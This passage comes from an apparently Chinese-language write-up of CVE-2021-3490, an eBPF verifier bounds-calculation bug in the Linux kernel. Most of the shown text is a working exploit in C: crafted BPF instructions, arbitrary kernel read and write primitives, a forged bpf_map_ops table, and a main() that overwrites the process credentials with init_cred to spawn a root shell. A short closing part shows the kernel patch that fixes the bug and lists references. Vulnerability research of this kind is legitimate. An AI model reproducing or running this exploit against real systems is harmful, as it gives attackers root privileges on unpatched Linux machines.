BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // r6 = r6 + 1 = 1
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1), // r6 = r6 & 1 = 1
BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // r6 = r6 + 1 = 2
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2), // r6 = r6 & 2 = 2 & 2 = 2
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1), // r6 = r6 >> 1 = 2 >> 1 = 1
BPF_LD_MAP_FD(BPF_REG_1, 4), // r1 = [expmap_fd] = bpf_map ptr2
BPF_MOV64_IMM(BPF_REG_8, 0), // r8 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8), // *(uint64_t*)(fp - 8) = r8 = 0
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr2, r2 = fp - 8
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 right
BPF_EXIT_INSN(), // exit
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 = value_buf2 addr
BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110), // r6 = r6 * 0x110 = 1 * 0x110 = 0x110
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6), // r7 = r7 - r6 = value_buf2 addr - 0x110
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), // r8 = *(uint64_t*)r7 = value_buf2[-0x110/8] = array_map_ops
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18), // *(uint64_t*)(r9 +0x18) = value_buf1[3] = r8 = array_map_ops
BPF_MOV64_REG(BPF_REG_2, BPF_REG_8), // r2 = r8 = array_map_ops
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0), // r8 = *(uint64_t*)(r7 +0xc0) = value_buf2[-(0x110-0xc0)/8] = map_addr
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20), // *(uint64_t*)(r9 +0x20) = value_buf1[4] = r8 = map_addr
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8), // r8 = *(uint64_t*)(r9 +8) = value_buf1[1] = arb_read addr
BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1), // if arb_read addr == NULL goto pc+1
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40), // *(uint64_t*)(r7 +0x40) = value_buf2[-(0x110-0x40)/8] = btf = r8
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10), // r8 = value_buf1[2] = fake_ops
BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4), // if arb_write flag == 0 goto pc+4
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), // expmap's bpf_map_ops = r8 = fake_ops
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK), // map_type = BPF_MAP_TYPE_STACK
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1), // max_entries = -1
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0), // spin_lock_off = 0
BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
};
#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };
union bpf_attr attr = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insns = (uint64_t) &prog,
.insn_cnt = sizeof(prog) / sizeof(prog[0]),
.license = (uint64_t) "GPL",
.log_level = 2,
.log_buf = (uint64_t) bpf_log_buf,
.log_size = BPF_LOG_SZ,
};
void init() {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
}
void trigger() {
char buffer[64];
write(sockets[0], buffer, sizeof(buffer));
}
void prep() {
value1 = (uint64_t*)calloc(0x2000, 1);
value2 = (uint64_t*)calloc(0x2000, 1);
prctl(PR_SET_NAME, "XiaozaYa");
map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
if (map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
if (expmap_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
prog_fd = bpf(BPF_PROG_LOAD, &attr);
if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
perror("socketpair()"), err_exit("socketpair()");
if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
// puts(bpf_log_buf);
}
uint32_t arb_read_4_byte(uint64_t addr) {
value1[0] = 0;
value1[1] = addr - 0x58;
value1[2] = 0;
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
return bpf_map_get_info_by_fd(expmap_fd);
}
uint64_t arb_read(uint64_t addr) {
uint64_t lo = arb_read_4_byte(addr);
uint64_t hi = arb_read_4_byte(addr+4);
return (hi << 32) | lo;
}
void prep_arb_write() {
uint64_t buf[0x200/8] = { 0 };
value1[0] = 0;
value1[1] = 0;
value1[2] = map_addr+0x110+0x20;
uint64_t fake_ops[] = {
0x0,0x0,0x0,0x0,
0xffffffff81376260,
0xffffffff813789d0,
0x0,
0xffffffff81377290,
0xffffffff81376430,
0x0,
0x0,
0xffffffff81344740,
0x0,
0xffffffff813443b0,
0x0,
0xffffffff81376710,
0xffffffff81377080,
0xffffffff813764b0,
0xffffffff81376430,
0x0,
0x0,
0x0,
0x0,
0xffffffff81377a80,
0x0,
0xffffffff81376cd0,
0xffffffff813784b0,
0x0,
0x0,
0x0,
0xffffffff81376350,
0xffffffff813763b0,
0xffffffff81376c00,
0x0,
0x0,
0x0,
0x0,
0xffffffff81378450,
0xffffffff82b0c920,
0xffffffff849b6500,
0xffffffff82b0d1a0
};
for (int i = 0; i < sizeof(fake_ops) / 8; i++) {
if (fake_ops[i]) fake_ops[i] += koffset;
}
memcpy(value2, fake_ops, sizeof(fake_ops));
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
}
void arb_write_4_byte(uint64_t addr, uint32_t val) {
value2[0] = val - 1;
bpf_map_update_elem(expmap_fd, &key, value2, addr);
}
void arb_write(uint64_t addr, uint64_t val) {
arb_write_4_byte(addr, val&0xffffffff);
arb_write_4_byte(addr+4, (val>>32)&0xffffffff);
}
void leak() {
uint64_t buf[0x2000/8] = { 0 };
value1[0] = 0;
value1[1] = 0;
value1[2] = 0;
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
memset(buf, 0, sizeof(buf));
bpf_map_lookup_elem(map_fd, &key, buf);
// binary_dump("LEAK DATA", buf, 0x100);
if ((buf[3] & 0xffffffff00000fff) == (array_map_ops & 0xffffffff00000fff)) {
koffset = buf[3] - array_map_ops;
kbase = 0xffffffff81000000 + koffset;
map_addr = buf[4] - 0xc0;
hexx("koffset", koffset);
hexx("kbase", kbase);
hexx("map_addr", map_addr);
}
if (koffset == -1) err_exit("FAILED to leak kernel base");
array_map_ops += koffset;
init_cred += koffset;
init_task += koffset;
init_nsproxy += koffset;
hexx("init_cred", init_cred);
hexx("init_task", init_task);
hexx("init_nsproxy", init_nsproxy);
current_task = init_task;
for (;;) {
// hexx("current_task", current_task);
if (arb_read(current_task+0xae8) == tag) {
break;
}
current_task = arb_read(current_task + 0x820) - 0x818;
}
hexx("current_task", current_task);
}
int main(int argc, char** argv, char** envp)
{
init();
prep();
leak();
prep_arb_write();
arb_write_4_byte(current_task+0xad8, init_cred&0xffffffff);
arb_write_4_byte(current_task+0xad8+2, (init_cred>>16)&0xffffffff);
arb_write_4_byte(current_task+0xad0, init_cred&0xffffffff);
arb_write_4_byte(current_task+0xad0+2, (init_cred>>16)&0xffffffff);
arb_write_4_byte(current_task+0xb40, init_nsproxy&0xffffffff);
arb_write_4_byte(current_task+0xb40+2, (init_nsproxy>>16)&0xffffffff);
get_root_shell();
puts("EXP NERVER END!");
return 0;
}
效果如下:
漏洞修复
patch
如下:
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 757476c91c984..9352a1b7de2dd 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -7084,11 +7084,10 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;
- /* Assuming scalar64_min_max_and will be called so its safe
- * to skip updating register for known 32-bit case.
- */
- if (src_known && dst_known)
+ if (src_known && dst_known) {
+ __mark_reg32_known(dst_reg, var32_off.value);
return;
+ }
/* We get our minimum from the var_off, since that's inherently
* bitwise. Our maximum is the minimum of the operands' maxima.
@@ -7108,7 +7107,6 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
-
}*/
static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const_subreg(reg->var_off, imm);
reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}
即在寄存器的低 32 位已知时,及时更新 32 位范围。
参考
【kernel exploit】CVE-2021-3490 eBPF 32位边界计算错误漏洞
【CVE.0x0A】CVE-2021-3490 漏洞复现及简要分析